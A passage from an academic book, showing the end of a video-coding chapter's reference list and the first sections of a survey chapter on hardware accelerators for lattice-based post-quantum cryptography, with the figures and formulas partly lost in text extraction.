frame compression based on intra-frame prediction for multiview video coding. In: 2013 IEEE
international conference on image processing. IEEE, pp 1831–1835
Sampaio F, Shafique M, Zatt B, Bampi S, Henkel J (2014) DSVM: energy-efficient distributed
scratchpad video memory architecture for the next-generation high efficiency video coding. In:
2014 design, automation & test in Europe conference & exhibition (DATE). IEEE, pp 1–6
Sampaio F, Shafique M, Zatt B, Bampi S, Henkel J (2015) Approximation-aware multi-level cells
STT-RAM cache architecture. In: 2015 international conference on compilers, architecture and
synthesis for embedded systems (CASES). IEEE, pp 79–88
Sandvine (2019) Global internet phenomena report. https://www.sandvine.com/press-releases/
sandvine-releases-2019-global-internet-phenomena-report
Shafique M, Henkel J (2011) Hardware/software architectures for low-power embedded multime-
dia systems. Springer Science & Business Media, Berlin
Shafique M, Henkel J (2014) Low power design of the next-generation high efficiency video
coding. In: 2014 19th Asia and South Pacific design automation conference (ASP-DAC). IEEE,
pp 274–281
Shafique M, Zatt B (2012) A complexity reduction scheme with adaptive search direction and mode
elimination for multiview video coding. In: 2012 picture coding symposium. IEEE, pp 105–108
Shafique M, Bauer L, Henkel J (2007) An optimized application architecture of the H. 264 video
encoder for application specific platforms. In: 2007 IEEE/ACM/IFIP workshop on embedded
systems for real-time multimedia. IEEE, pp 119–124
Shafique M, Bauer L, Henkel J (2008) 3-tier dynamically adaptive power-aware motion estimator
for H. 264/avc video encoding. In: Proceeding of the 13th international symposium on low
power electronics and design (ISLPED’08). IEEE, pp 147–152
Shafique M, Bauer L, Henkel J (2009a) A parallel approach for high performance hardware design
of intra prediction in H. 264/avc video CODEC. In: 2009 design, automation & test in Europe
conference & exhibition. IEEE, pp 1434–1439
236 M. Shafique and B. S. Prabakaran
Shafique M, Molkenthin B, Henkel J (2009b) Non-linear rate control for H. 264/avc video encoder
with multiple picture types using image-statistics and motion-based macroblock prioritization.
In: 2009 16th IEEE international conference on image processing (ICIP). IEEE, pp 3429–3432
Shafique M, Bauer L, Henkel J (2010a) enbudget: a run-time adaptive predictive energy-budgeting
scheme for energy-aware motion estimation in H. 264/mpeg-4 avc video encoder. In: 2010
design, automation & test in Europe conference & exhibition (DATE 2010). IEEE, pp 1725–
1730
Shafique M, Bauer L, Henkel J (2010b) Optimizing the H. 264/avc video encoder application
structure for reconfigurable and application-specific platforms. J Sig Process Syst 60(2):183–
210
Shafique M, Molkenthin B, Henkel J (2010c) An HVS-based adaptive computational complexity
reduction scheme for H. 264/avc video encoder using prognostic early mode exclusion. In: 2010
design, automation & test in Europe conference & exhibition (DATE 2010). IEEE, pp 1713–
1718
Shafique M, Zatt B, Walter FL, Bampi S, Henkel J (2012) Adaptive power management of on-chip
video memory for multiview video coding. In: DAC design automation conference 2012. IEEE,
pp 866–875
Singh G, Chelini L, Corda S, Awan AJ, Stuijk S, Jordans R, Corporaal H, Boonstra AJ (2019)
Near-memory computing: past, present, and future. Microprocess Microsyst 71:102868
Statista Research Department (2021) Global mobile data traffic share. https://www.statista.com/
statistics/383715/global-mobile-data-traffic-share/
Sullivan GJ, Ohm JR, Han WJ, Wiegand T (2012) Overview of the high efficiency video coding
(HEVC) standard. IEEE Trans Circuits Syst Video Technol 22(12):1649–1668
Teimoori MT, Hanif MA, Ejlali A, Shafique M (2018) Adam: adaptive approximation management
for the non-volatile memory hierarchies. In: 2018 design, automation & test in Europe
conference & exhibition (DATE). IEEE, pp 785–790
Vanne J, Viitanen M, Hamalainen TD, Hallapuro A (2012) Comparative rate-distortion-complexity
analysis of HEVC and avc video codecs. IEEE Trans Circuits Syst Video Technol 22(12):1885–
1898
Vizzotto BB, Zatt B, Shafique M, Bampi S, Henkel J (2012) A model predictive controller for
frame-level rate control in multiview video coding. In: 2012 IEEE international conference on
multimedia and expo. IEEE, pp 485–490
Wang TC, Mallya A, Liu MY (2021) One-shot free-view neural talking-head synthesis for video
conferencing. In: Proceedings of the IEEE/CVF conference on computer vision and pattern
recognition, pp 10039–10049
Wien M, Bross B (2020) Versatile video coding–algorithms and specification. In: 2020 IEEE
international conference on visual communications and image processing (VCIP). IEEE, pp 1–3
World Health Organization (2021) COVID-19 weekly epidemiological update, edition 46, 29 june
2021. https://www.financialexpress.com/brandwagon/2020-rise-of-paid-subscribers/2172942/
Zadtootaghaj S, Schmidt S, Barman N, Möller S, Martini MG (2018) A classification of video
games based on game characteristics linked to video coding complexity. In: 2018 16th annual
workshop on network and systems support for games (NetGames). IEEE, pp 1–6
Zatt B, Shafique M, Bampi S, Henkel J (2011a) A low-power memory architecture with
application-aware power management for motion & disparity estimation in multiview video
coding. In: 2011 IEEE/ACM international conference on computer-aided design (ICCAD).
IEEE, pp 40–47
Zatt B, Shafique M, Sampaio F, Agostini L, Bampi S, Henkel J (2011b) Run-time adaptive
energy-aware motion and disparity estimation in multiview video coding. In: 2011 48th
ACM/EDAC/IEEE design automation conference (DAC). IEEE, pp 1026–1031
Zhou Y, Tian L, Zhu C, Jin X, Sun Y (2019) Video coding optimization for virtual reality 360-
degree source. IEEE J Sel Top Sig Process 14(1):118–129
Post-Quantum Cryptographic Accelerators
8
Ayesha Khalid and Dur-e-Shahwar Kundi
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 238
Post-Quantum Cryptography (PQC) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 240
NIST Post-Quantum Cryptography Standardisation Project . . . . . . . . . . . . . . . . . . . . . . . . 240
Classes of Post-Quantum Cryptography . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 241
Lattice-Based Cryptography Primitives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 244
Lattices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 244
Computational Problems on Lattices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 244
Average-Case Problems on Standard Lattices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 245
Classes of Lattices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 246
Ring-LWE Based PKE Scheme . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 247
Computationally Intensive Components of LWE (and Variants) . . . . . . . . . . . . . . . . . . . . . 248
Coprocessors for the Lattice-Based Cryptography . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 254
General Optimisation Strategies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 254
Performance Benchmarks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 255
Coprocessors Design Paradigms for Lattice-Based Cryptography . . . . . . . . . . . . . . . . . . . . 256
Optimization Strategies for Implementation of Underlying Components . . . . . . . . . . . . . . 261
Physical Protection of Lattice-Based Cryptography . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 266
Timing Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 267
Power Analysis Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 267
Fault Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 268
Challenges in the Post-Quantum Cryptography Adaptation . . . . . . . . . . . . . . . . . . . . . . . . . . . 269
Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 270
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 271
Abstract
Keywords
Introduction
Due to the advances in the field of Quantum computing, the security of the
digital world of today stands at the brink of a complete and urgent overhaul. This
is primarily because of the following two Quantum algorithms that will affect the
security of the modern-day cryptographic algorithms.
• The Grover’s Algorithm (Grover 1996) affects only the symmetric key algo-
rithms. By virtue of this algorithm, someone with a Quantum
√ computer will be
able to find a number in an unordered list of length N in N time, rather than the
classical algorithm which takes (N ÷ 2) time. Hence in a post Quantum world,
the key sizes of symmetric key cryptographic algorithms should be doubled to
gain half the security level, i.e. a AES-256 with a 256 bit key would provide an
AES-128 equivalent security.
• The Shor’s Algorithm (Shor 1994) enables a Quantum computer to carry
out prime factorisation to be solved in polynomial time, making RSA-based
cryptosystems unviable. Shor’s Algorithm can also be used to solve the discrete
logarithm problem, leaving the majority of modern public key cryptography
vulnerable and unusable in a post-Quantum world.
The threat posed by the Quantum computers has led to active research into
new cryptographic schemes which would be hard to solve on both classical and
Quantum computers. These schemes are termed generally in scientific literature as
Post-Quantum Cryptography (PQC) or Quantum-Resistant Cryptography (QRC)
or Quantum-safe cryptography. Post-Quantum Cryptography will replace the public
key algorithms that make the backbone of all cryptographic protocols used today.
These algorithms can run on classical computers used today, yet remain secure
against known Quantum computing attacks. The National Institute of Standards and
Technology (NIST) initiated a Post-Quantum Cryptography (PQC) competition in
2016 to standardise Quantum resilient cryptosystems for the key exchange and dig-
ital signatures (Moody 2016). The NIST PQC competition has performed multiple
rounds of evaluation of schemes submitted, with a much lower number of candidate
schemes going forward to the next round. At the moment the 3rd round of the NIST-
PQC is underway with seven finalists scheme and an expected date to conclude in
2022–2024 with a suite of acceptable candidates for standardisation (Moody 2016).
The various Post-Quantum Cryptography schemes under consideration in the
NIST PQC come from a very diverse background of mathematical problems. What
remains common for all of these Quantum-resistant algorithms is the fact that
they are more complex than the currently deployed public key techniques, with
much larger key sizes in comparison, making them at times, impractical for low-
cost devices. This has rightly led to an active research community undertaking
coprocessors for PQC on a range of platforms. This chapter provides a survey of
the challenges for that and the successes achieved. In section “Post-Quantum Cryp-
tography (PQC)”, we discuss major classes of Post-Quantum Cryptography (PQC)
and NIST efforts for PQC standardisation. Evidence and reasons for popularity of
Lattice-based schemes over the others are discussed as well. Section “Lattice-Based
Cryptography Primitives” looks at the fundamental mathematics and some
240 A. Khalid and D.-S. Kundi
Start Project
Formal Call
Submission deadline: 82 proposals
Round 1 results announced: 69 proposals
1st PQC standardization conference
Round 2 results announced: 26 proposals
2nd PQC standardization conference
Initial Submissions
There were a total of 82 submissions to the NIST PQC, in the form of PKE (Public
Key Exchange), DSS (Digtial Signature Schemes) and KEM (Key Encapsulation
Mechanism) schemes. The submissions spanned the five main Quantum-safe fami-
lies, along with some miscellaneous and classical cryptography bases.
In the past few years, research community has focused on several powerful
cryptographic primitives that are not vulnerable to Quantum attacks. University
research groups, governments worldwide, standards bodies such as the NIST and
the European Telecommunications Standards Institute (ETSI) and companies like
Google, IBM and many others are currently researching Post-Quantum Cryptogra-
phy for this purpose. There are several strands of PQC currently being examined by
the research community.
242 A. Khalid and D.-S. Kundi
Code-Based
Code-based cryptography is based on the underlying one-way functions, i.e.
error-correcting codes that are considered to be NP-hard (Wieschebrink 2006).
There are two classic code-based cryptography systems named after Robert
McEliece (McEliece 1978) and Harald Niederreiter (Niederreiter and Xing 2009),
their inventors. For encryption of plain text, the message is encoded either by
adding errors into the message or encoding a message into an error sequence;
error correction during decryption recovers the original message. Code-based
cryptography can provide not only the PKE, KEMs and DSS schemes, but also
other cryptographic functions including identification schemes, random number
generators and hash functions. A challenge surrounding code-based systems is their
very large key sizes which render their implementation impossible on embedded
devices with very limited resources. However, the confidence on them is boosted
by their mathematical roots, e.g. McEliece scheme (and its variants) has remained
secure for 40 years. The Classic McEliece scheme is part of the four PKE finalist
schemes, and BIKE is included in the alternate schemes in the third round of NIST
PQC (NIST 2020).
Multivariate-Based
The hardness of solving non-linear multivariate equation structures over finite fields
is the foundation of Multivariate Cryptography schemes as seeking a solution for
such structures is an NP-complete/-hard problem (Ding and Petzoldt 2017). They
have been more successfully used to build digital signature schemes but not PKE.
Multivariate signatures have the advantage of being fast and having short signature
sizes; however key sizes are large and security proofs are lacking, with security
estimates solely based on known attacks. Rainbow is a Multivariate-based signature
scheme that made it to the finalist list of 3rd round of NIST PQC, while GeMSS (A
Great Multivariate Short Signature) is included into the alternate signatures list as
well (NIST 2020).
Hash-Based
The security of hash-based signatures relies on the collision resistance of the
underlying hash function. Examples of hash-based schemes are Merkle (Merkle
1989) and XMSS (Buchmann et al. 2011). Their security is well understood; they
offer promising performance as well as small signature sizes, making the hash-based
signatures a promising Quantum-safe alternative. One of the challenges is creating
practical stateless hash-based schemes. Stateful signature schemes require keeping
track of the signing keys to ensure they are never reused. SPHINCS+ is an example
of a practical stateless hash-based signature that is also included into the alternate
list of the 3rd round of NIST PQC (NIST 2020).
Isogeny-Based
One of the most recent additions to the Quantum-resistant cryptography is based on
the hardness of isogenies over elliptic curves (Jao and De Feo 2011). The Isogeny-
based schemes are attractive due to their short key sizes. Further cryptanalysis
8 Post-Quantum Cryptographic Accelerators 243
Lattice-Based
Arguably the most popular of the post-Quantum contenders are the Lattice-based
cryptography (LBC) schemes. They are characterised by their associated worst-
case hardness problems, upon which both basic such as public-key encryption
(PKE) (Regev 2010), Key Exchange Mechanism (KEM) and digital signature
schemes (DSS) (Ducas et al. 2013) and the more advanced cryptographic primitives
can be built upon. A popular lattice problem is Learning With Errors (LWE) (Regev
2005; Daniele and Oded 2009); many LWE-based schemes have proven to be just
as, if not more, efficient than existing comparable primitives.
The alternate security primitives to replace the current ones must keep up with
the rapid developments in technology as a whole. For instance, with the societal
shift towards the Internet of Things, ensuring security and privacy for an increasing
number of heterogeneous connected devices is a crucial concern for which the
Quantum-safe cryptographic family must cater for. In this context, the advanced
cryptographic primitives by lattices offer the most adaptable and versatile security
solutions. Google has trialled the Lattice-based Quantum-safe scheme NewHope in
its Chrome browse in 2016 (Braithwaite 2005), and the Lattice-based DSS called
BLISS-B has been integrated into the StrongSwan IPSec implementation 3 (Steffen
et al. 2005).
Lattice-based cryptography schemes stand out because of the following various
reasons:
Lattice-based schemes made the majority of NIST PQC initial submissions, with
39% of Round 1 candidates out of a total 69 being Lattice-based in construction.
Lattices stayed popular later too, with 12 out of the 26 Round 2 candidates and 5
244 A. Khalid and D.-S. Kundi
Fig. 2 NIST PQC Rounds (from left to right for Round 1, 2, 3) percentage composition of the
candidates according to their types. Round 1, 2 and 3 have 69, 26 and 7 (finalists only) candidates
in total with 39%, 46% and 71% candidates Lattice-based in their construction, respectively
Lattices
The shortest vector problem (SVP) (Ajtai 1998) and the closest vector problem
(CVP) (Daniele 2001) are the two basic computational problems on lattices and are
foundation of many LBC schemes.
C=(c0,c1)
λ2
D=(d0,d1)
λ1=2b0--b1
λ1 B0=(b0,b1)
B1=(b2,b3)
The underlying lattice problems CVP and the SVP are assumed to be non-
deterministic polynomial-time (NP)-hard problems, which means they cannot be
solved in polynomial time (Ajtai 1996) and are resistant to Quantum computing
attacks. Indeed, many schemes are based on the hardness of approximating the
solution of these problems to within polynomial or super-polynomial factors. It
is common for cryptographic primitives to base their security on average-case
problems which have been proven to be at least as hard as the core lattice problems.
Other than the usage of standard lattice problems like the SVP or CVP, the two most
commonly used average-case problems are the short integer solution (SIS) (Ajtai
1996) and the learning with errors (LWE) (Regev 2005) problems that became the
foundation of many Lattice-based schemes.
• SIS problem: This states that given a random matrix A ∈ Zqm×n chosen
uniformly, it is difficult to find a non-zero short vector v ∈ Zqm \ {0} such that
v T A = 0T and norm of v ≤ β, where β represents the norm-bound, q the integer
modulus.
The SIS problem was first introduced by Ajtai in (1996), and based on it the
public-key cryptosystem was provided by Ajtai and Dwork in (1997). Afterwards,
it served as a foundation of first practical Lattice-based cryptosystem by Hoffstein,
Pipher and Silverman in 1998, i.e. the encryption scheme NTRU (Hoffstein et al.
1998). To date the encryption scheme NTRUEncrypt has withstood cryptanalytic
scrutiny provided the parameters are chosen correctly, but the NTRU-based digital
signature scheme NTRUSign is considered broken. However, a modified version of
the signature scheme has been submitted to the NIST post-Quantum call, along with
246 A. Khalid and D.-S. Kundi
• LWE problem: This states that given a polynomial number of samples of the
form (a, a, s + e), it is difficult to determine the secret vector s ∈ Zqn , where n
is a power-of-two integer, defining the input dimension and q is a prime modulus,
the vector a is sampled uniformly at random from Zqn and the error e is sampled
from the appropriate error distribution.
Classes of Lattices
There are three classes of lattices that are relevant to LBC schemes, and all these
classes have in common that they require computations with large matrices that
either need a lot of memory or require costly on-the-fly computations.
common to add structure to the lattices to reduce this by a square root factor, at
the expense of a stronger security assumption.
• Ideal or ring Lattice-based schemes: An alternative to standard lattices is
the ideal/ring lattices while maintaining the hardness of an original problem;
in this case now the security of the constructed schemes is based on ring
variants of original problem, hence, the Ring-LWE and Ring-SIS. Examples from
the NIST’s PQC standardisation process are the PKC/KEM shemes, Newhope,
NTRU and NTRU Prime while signature schemes, qTesla, Falcon, etc. In ring
lattices, the matrix that is used in standard lattices is now represented by a
single row, and the remaining rows are generated by cyclic shifts of the first
row. Therefore ring Lattice-based schemes are more efficient as they require
less memory, and the main arithmetic operation is polynomial multiplication
instead of matrix-vector multiplication. As they are more efficient, the additional
structure in the lattice might also be exploitable by attacks. To date, this is not
known to introduce any vulnerability to the security, while allowing great benefits
in efficiency. Not only are the key sizes reduced, but the speed of underlying
operations can be increased due to this new structure.
• Module Lattice-based schemes: To have a trade-off between the efficiency
of ideal/ring lattices and the trust in the security of standard lattices, module
lattices were introduced. In other words, the module variant provides a middle
ground between standard and ideal/ring lattice by reducing the algebraic structure
present in ideal and increases the security without compromising much on the
computational efficiency. The security of module lattices is once again based
on variants of the original mathematical problems, hence, Module-LWE or
Module-SIS. Examples from NIST’s PQC standardisation process are PKC/KEM
shemes, CRYSTALS-Kyber, SABER and Three Bears while digital signature
schemes (DSS), CRYSTALS-Dilithium. In module lattices the matrix has small
dimensions as defined by parameter k, and the coefficients of the matrix are no
longer simple integers but entire polynomials. The value of k varies from 2, 3,
4 as in case of CRYSTALS-Kyber providing the increased security level (which
is discussed in section “Performance Benchmarks”) (Bos et al. 2019; Yao et al.
2021).
From an architectural point of view, R-LWE-based PKE algorithm has two compu-
tationally intensive components: the sampling of values from a discrete Gaussian-
distributed random source, i.e. Dσ , and the calculation of a series of linear algebraic
operations specially modular polynomial multiplication (×). The algorithmic back-
ground of these components is given below.
8 Post-Quantum Cryptographic Accelerators 249
Knuth-Yao Sampler: this is a tree based algorithm for discrete Gaussian sampling.
If you have N samples which are all represented by no more than λ-bits this can be
represented as a binary matrix which can be used to create a binary tree. This tree
is called the discrete distribution generating tree. It contains λ levels and two types
of nodes: internal nodes, which have two children and terminal nodes, which have
none. To create a sample a “walk” is taken from the root node downwards, going
onto the right child if the node is 1 and left if it is 0. Once a terminal node is reached
it outputs the index number associated with that same. Where RAM was used in
the hardware implementation in Howe et al. (2018) this method provided the best
results and has a lower area than CDT.
Polynomial Multiplication
In order to perform decryption and encryption operations, modular polynomial
multiplication must be performed which is a quite computationally intensive task.
Generally, it is computed using a schoolbook-based polynomial multiplication
(SPM) algorithm or a number theoretic transform (NTT).
Schoolbook Algorithm
This is the naive way to calculate the polynomial multiplication. It uses direct mul-
tiplication and accumulates the results, which can make it quite slow. Hence, when
used for standard/ideal lattices, the algorithm has a quadratic complexity of O(n2 ).
8 Post-Quantum Cryptographic Accelerators 251
n−1
n−1
= (−1) (i+j )/n
ai bj x (i+j ) mod n (1)
i=0 j =0
outlines the protocol utilising NTT technique. Firstly, we need to transform each
input into the NTT domain as given by line 4 and then perform the computations as
required by the R-LWE scheme. And for the final decrypted message, we need to
apply the INTT to convert it back to the normal domain as given by line 7.
Barrett’s Reduction
This is not a method of performing the multiplication in itself but a method of
improving performance when doing the modular portion of the multiplication. It was
first presented in 1986 after digital signal processors (DSP) were introduced (Barrett
1986). Barrett’s reduction replaces the costly divisions to get the modulo result with
multiplications and a subtraction as given by Algorithm 4. It includes an estimation
of how often the modulus has to be subtracted to obtain a result smaller than
the modulus. To accelerate the Barrett’s modular reduction in hardware, mostly
Optimisation of an algorithm always has a specific goal in mind, e.g. to better fit the
constraints imposed by a target platform (set the word size of the architecture as bit
size of the modulus, etc.). The optimisation goal is consequently dependent on the
choice of an appropriate target platform of implementation with specific features.
Lattice-based cryptographic algorithms generally are more data-flow centric instead
of being control-flow centric and are consequently better suited for hardware
optimisations since a simple control flow leads to a simple state machine and a better
higher utilisation of the underlying configurable hardware components. Similarly,
8 Post-Quantum Cryptographic Accelerators 255
Performance Benchmarks
• Security Strength: For most of the LBC algorithms, the choice of security
strength dictates a trade-off between performance (cost, resource, latency) and
the required application security level. In the NIST call for PQC, the proposals
invited had to classify the range of their algorithms security strength equivalent
to the existing NIST standards in symmetric cryptography, i.e. (in order of
increasing strength) a security strength of 1,. . . ,5 implies that any brute force
cryptanalytic effort requires computational resources comparable to (or greater
than those) required for key search on AES block cipher or finding a hash
collision on SHA-2 (Moody 2016), as shown in Table 2. The security levels 4 and
5 are considered for high-security use-cases only, e.g. government, military, long-
term data storage, etc. For IoT applications, higher security levels are generally
less desirable due to their associated resource overheads.
• Low Resource Usage: For configurable hardware platforms, reduction in the
area occupied generally directly translates to a less expensive and more energy-
efficient design. A typical technique to do that is serial execution of operations
sharing the same components. If block RAM units are used, they could be stored
to maximum capacity to keep the number of used memory components small
even though that means that only one memory access per clock cycle is possible
(two for dual-port memories). Similarly, pre-computed tables can be calculated
Table 2 The security levels Security level At least as difficult to break as. . .
specified by NIST in their call
1 AES-128
for submissions (Moody
2016) 2 SHA256
3 AES-192
4 SHA384
5 AES-256
256 A. Khalid and D.-S. Kundi
Table 3 Dynamic memory usage (in bytes) and the Clock cycle counts for various leading
Lattice-based PQC NIST 2nd round KEM contestants on an ARM Cortex-M at 168 MHz
Scheme Ref. Operation Cycles Time (ms) Stack (Bytes)
Lattice-based PQC KEMs
Saber Karmakar et al. (2018) Key Gen 1,147,000 7 13,883
(speed) Enc. 1,444,000 9 16,667
Dec. 1,543,000 9 17,763
Saber Karmakar et al. (2018) Key Gen 1,165,000 7 6931
(memory) Enc. 1,530,000 9 7019
Dec. 1,635,000 10 8115
Kyber-1 PQM4 (2018) Key Gen 726,921 4 6456
Enc. 987,864 6 9120
Dec. 1,018,946 6 9928
Kyber-3 PQM4 (2018) Key Gen 1,200,291 7 10,544
Enc. 1,446,284 9 13,720
Dec. 1,477,365 9 14,880
Kyber-5 PQM4 (2018) Key Gen 1,771,729 11 15,664
Enc. 2,142,912 13 19,352
Dec. 2,188,917 13 20,864
FrodoKEM Howe et al. (2018) Key Gen 101,273,066 603 35,484
-AES Enc. 106,933,956 637 63,484
Dec. 107,393,295 639 63,628
FrodoKEM Howe et al. (2018) Key Gen 187,070,653 1114 33,800
-cSHAKE Enc. 253,735,550 1510 57,968
Dec. 254,194,895 1513 58,112
Lattice-based PQC signatures
Falcon-1 Oder et al. (2019) Key Gen. 114,546,135 682 63,652
Sign 80,503,242 479 63,653
Verify 530,900 3 63,654
Falcon-5 Oder et al. (2019) Key Gen. 365,950,978 2178 120,596
sign 165,800,855 987 120,597
verify 1,046,700 6 120,598
CRYSTALS Güneysu et al. (2018) Key Gen. 2,320,362 14 50,488
Dilithium Sign 8,348,349 50 86,568
Verify 2,342,191 14 54,800
Classical schemes
ECC-256 UM0586 (2018) Key Gen. 12,713,277 76 –
Sign 13,102,239 78 –
Verify 24,702,099 147 –
RSA-2048 UM0586 (2018) Key Gen. – – –
Sign 228,068,226 1358 –
Verify 61,951,481 369 –
8 Post-Quantum Cryptographic Accelerators 259
more compact design. Similarly the routing in ASICs entertains only the specific
logic used, unlike a generic routing components for multiple FPGA elements.
For lightweight IoT end-node devices, high security levels are less desirable
due to their associated overhead; consequently level 3 security or close is
used; generally a minimum of 112-bits is employed (McKay et al. 2016).
The lightweight hardware implementation of symmetric block ciphers requires
2– 4K Gate Equivalents (GEs) with reasonable performance while asymmetric
cryptography (ECC processor) involves 10k–12k GEs (having respective security
level of 113-bit to 131-bit) (Eisenbarth et al. 2007) that now need to be replaced
by the LBC algorithms having resistance to the Quantum attacks. The complexity
of LBC calls for much more complex designs with a higher budget.
The state-of-the-art reported ASICs based LBC implementation proposed are
summarised in Table 4. In (2018), Song et al. designed Lattice Encryption
Instruction Accelerator (LIEA) chip for R-LWE scheme, employing NTT-
based multiplier and Discrete Gaussian sampler with SHA-256 for seed
generation. The chip consumed very low energy (119 nJ) for parameter for 106-
bit security with 776k GE that is significantly high for passive IoT devices.
In another study (Oder et al. 2019; Nejatollahi et al. 2018) using gem5-
aladdin to explore the design space of LBC schemes for the domain-specific
accelerators ranging from resource-constraint IoT devices to high-performance
computing applications. The exploration workflow provides an early estimate
of area and power consumption for various parameter sets targeting FPGA as
well as ASICs platforms. The minimum achievable gate count for NTT-based
multiplier module (NTT_small) on ASIC using 45 nm technology 189k GE
at a cost of considerably high energy consumption is 596.86 nJ. Basu et al.
and, as previously mentioned, the use of the convolution property to reduce the
size of the pre-computed tables. In order to implement the CDT approach in
constant time, Güneysu (Pöppelmann and Güneysu 2013) proposed the input
value to be compared to all table entries using parallel comparators. Howe et al.
(2018) instead recommended using binary search algorithm to reach the required
value in the CDT table, resulting in a very lightweight and yet a constant-
time alternative, outperforming it by a factor of around 5× in terms of Ops/s/S
(operations per second per slice) compared to the one proposed in Pöppelmann
and Güneysu (2013).
2. Bernoulli Sampling: Bernoulli sampling is optimised rejection sampling using
the Bernoulli distribution. In (2014), Oder et al. compared Bernoulli, Knuth-
Yao and Ziggurat Gaussian sampling methods on a Cortex-M4F microcontroller
concluding that the Bernoulli performs better than Knuth-Yao and Ziggurat,
in terms of both memory requirements and speed. Bernoulli sampler is leaky in
terms of timing, and to achieve constant time, it has to (Howe et al. 2018) perform
many more comparison than the designs previously proposed in the literature.
3. Knuth-Yao Sampling: In (2013), Roy et al. proposed a hardware design
of Knuth-Yao sampling for use in LWE encryption schemes. The proposed
optimisations include the implementation of a discrete distribution generating
tree, optimised storage of a probability matrix and also the column-wise
compression of zeros existing in the probability matrix. The Knuth-Yao random
walk does not operate in constant time and was slow due to bit by bit scanning.
In Howe et al. (2018) a pre-calculation was suggested improving the Ops/s/S of
the Knuth-Yao Sampling by a factor of 2. Both of these implementations were
non-constant time and therefore vulnerable to timing attacks. Roy et al. (2014)
proposed random shuffling of samples to counter timing attacks.
4. Discrete Ziggurat Sampling: Buchmann et al. (2013) proposed a C++ imple-
mentation with several optimisations and compared Ziggurat with alternative
sampling methods to show that Ziggurat is suitable when large standard devia-
tions are required. Discrete Ziggurat sampling has a non-constant running time.
The only hardware implementation (that was constant time as well) was proposed
in Howe et al. (2018) showed that despite requiring a large amount of area
resources, the discrete Ziggurat sampler offers generally a higher throughput.
5. Binomial Sampling: More recently, most of the Lattice-based cryptographic
schemes requiring narrow Gaussian distributions use binomial distribution-based
sampling techniques. A reduction using the Rényi divergence (Takashima and
Takayasu 2015) is provided that shows that the usage of a binomial distribution
instead of a rounded continuous Gaussian distribution will not provide an
attacker with a significant advantage. In order to sample from a binomial
distribution, one has to count the Hamming weight of two random bit vectors. For
small standard deviations (commonly used in Lattice-based encryption schemes
but not in signature schemes), this approach leads to very efficient samplers that
do not require any pre-computed tables and run in constant time. However, for
larger standard deviations, the binomial sampler suffers from long running times
since the length of the bit strings increases as the square of the standard deviation.
8 Post-Quantum Cryptographic Accelerators 263
KY_Enc_RAM_Time-Dep.
Overall Throughput
Samplers Per Second (×106)
Fig. 4 Graphical performance results of all proposed discrete Gaussian samplers, on the Spartan-
6 LX25-3 FPGA, with and without RAM use. All results are time-independent unless otherwise
stated (Time-Dep.) (Howe et al. 2018)
In Howe et al. (2018), thorough investigation of all the practical discrete Gaussian
samplers (CDT, Knuth-Yao, Bernoulli and discrete Ziggurat) used in Lattice-
based cryptosystems is carried out. Novel time-independent implementations are
presented, ensuring resistance against timing attacks; the designs also focus on low
area foot-print and high throughput. A survey of all FPGA-based implementations
reported to date is presented and analysed with the proposed hardware sampler
designs clearly outperforming most of the previously proposed samplers. Figure 4
plots the post-PAR results for CDT, Knuth-Yao (KY), Bernoulli (Ber) and discrete
Ziggurat (DZigg) samplers, both with and without the use of RAMs, targeted to
the same FPGA device. For encryption, where a design does not use any RAM,
the discrete Ziggurat sampler (DZigg_Enc) is the fastest, offering approximately
97 operations per second, but with a large area requirement. However, the RAM-
free CDT (CDT_Enc) sampler surpasses all others in terms of an overall balanced
performance with area, throughput and timing independence. If the use of addi-
tional BRAMs is considered, the Knuth-Yao time-independent implementation
(KY_Enc_RAM) has the best overall performance in terms of low area, high
throughput and also the lowest number of bits required per sample. For signatures,
the RAM-free CDT implementation (CDT_Sign) proves to be an overall winner,
followed by the discrete Ziggurat sampler (DZigg_Sign), and the Bernoulli sampler
(Ber_Sign), being around 2x more expensive in terms of slices, which also boasts a
better throughput per slice.
Polynomial Multiplication
In the context of polynomial multiplication, selecting either standard (LWE),
module (M-LWE) or ideal (R-LWE) lattices in Lattice-based constructions has
the significant impact on the system in terms of efficiency. Therefore, optimised
strategies for polynomial multiplication have been one of the core interests by
264 A. Khalid and D.-S. Kundi
the research community. For hardware designs, the modulus-q dictates the size of
the multiplier or multipliers (i.e. log2 q-bit) required in a hardware design of a
cryptosystem using any class of lattices. It is to be noted that hardware designs
of Lattice-based cryptosystems using LWE or M-LWE rather than R-LWE cannot
be considered low-area due to the inherently large key sizes required in such
cryptosystems. However, matrix-vector multiplication is a traditional digital signal
processing (DSP) task, and there are dedicated and optimised DSP hardware units
available on FPGAs that can be targeted to accelerate the performance of these
operations. This could improve the efficiency of LWE/M-LWE hardware designs
